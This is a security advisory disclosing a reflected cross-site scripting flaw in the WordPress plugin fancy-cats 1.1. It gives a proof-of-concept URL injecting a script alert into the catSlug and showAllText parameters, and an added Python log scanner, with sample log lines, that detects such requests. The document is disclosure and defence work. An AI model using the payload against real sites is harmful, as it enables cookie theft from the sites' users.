wp-plugin : fancy-cats

Plugin Details
Plugin Name: wp-plugin : fancy-cats
Affected Version : 1.1 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
http://localhost/wp-content/plugins/fancy-cats/getCatPosts.php?catSlug=catSlug'><script>alert(document.cookie)</script>&catId=catId&showAllText=showAllText'><script>alert(document.cookie)</script>&

 

Vulnerable Parameter : catSlug, showAllText

 

Type of XSS : Reflected
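
A defender-side check for the requests described above, as an added example that is not part of the original advisory: it scans web-server access logs for requests to getCatPosts.php whose catSlug or showAllText values carry HTML metacharacters, decoding a second time to catch double-encoded input. The function names and the sample log lines are constructed for illustration, and the combined access-log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint and parameter names are taken from the advisory above.
ENDPOINT = "/wp-content/plugins/fancy-cats/getCatPosts.php"
REFLECTED_PARAMS = ("catSlug", "showAllText")
# Characters that let a value break out of an HTML attribute or open a tag.
MARKUP = re.compile(r"[<>'\"]")
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return the reflected parameters of `target` that carry markup characters."""
    parts = urlsplit(target)
    if not parts.path.endswith(ENDPOINT):
        return []
    query = parse_qs(parts.query, keep_blank_values=True)
    hits = []
    for name in REFLECTED_PARAMS:
        for value in query.get(name, []):
            # parse_qs decodes once; decode again to catch double-encoded input.
            if MARKUP.search(value) or MARKUP.search(unquote(value)):
                hits.append(name)
                break
    return hits

def scan(lines):
    """Yield (line_number, [param, ...]) for log lines that match."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            hits = suspicious_params(match.group(1))
            if hits:
                yield number, hits

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [07/Jul/2014:10:00:01 +0000] "GET /wp-content/plugins/fancy-cats/getCatPosts.php?catSlug=news&catId=3&showAllText=Show+all HTTP/1.1" 200 512',
    '198.51.100.9 - - [07/Jul/2014:10:00:05 +0000] "GET /wp-content/plugins/fancy-cats/getCatPosts.php?catSlug=x%27%3E%3Cscript%3Ealert(1)%3C/script%3E&catId=3&showAllText=ok HTTP/1.1" 200 640',
    '198.51.100.9 - - [07/Jul/2014:10:00:09 +0000] "GET /wp-content/plugins/fancy-cats/getCatPosts.php?catSlug=a&catId=3&showAllText=%253Cb%253E HTTP/1.1" 200 530',
    '198.51.100.3 - - [07/Jul/2014:10:00:12 +0000] "GET /index.php?catSlug=%3Cb%3E HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: markup in {', '.join(hits)}")
```

A legitimate showAllText value containing an apostrophe will also match, so treat hits as leads to review rather than confirmed attempts.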


Disclosure Timeline
Vendor Contacted : 2014-01-04
Plugin Status : Updated on
Public Disclosure : July 7, 2014
CVE Number :
Plugin Description :
This is an extended categories widget. When the user clicks on a category from the widget, rather than loading a page with all of the posts in that category, a space will expand within the widget, showing the titles of all posts in that category.

There are several configurable settings, so that the widget will fit in with the look and feel of your blog. You can set:
* A limit on the height of the expanded area, so that a scroll bar will show if you have lots of posts in a category
* The indentation of the post items
* The title text, the instructional text, and the 'show all' text

The expanding/collapsing of category post lists is done via AJAX, so the entire page doesn't have to continuously reload to perform the operation.

If there is an extra feature you would like added, or something that you don't like and want to be able to change yourself, contact me and I will see about adding it in the next version.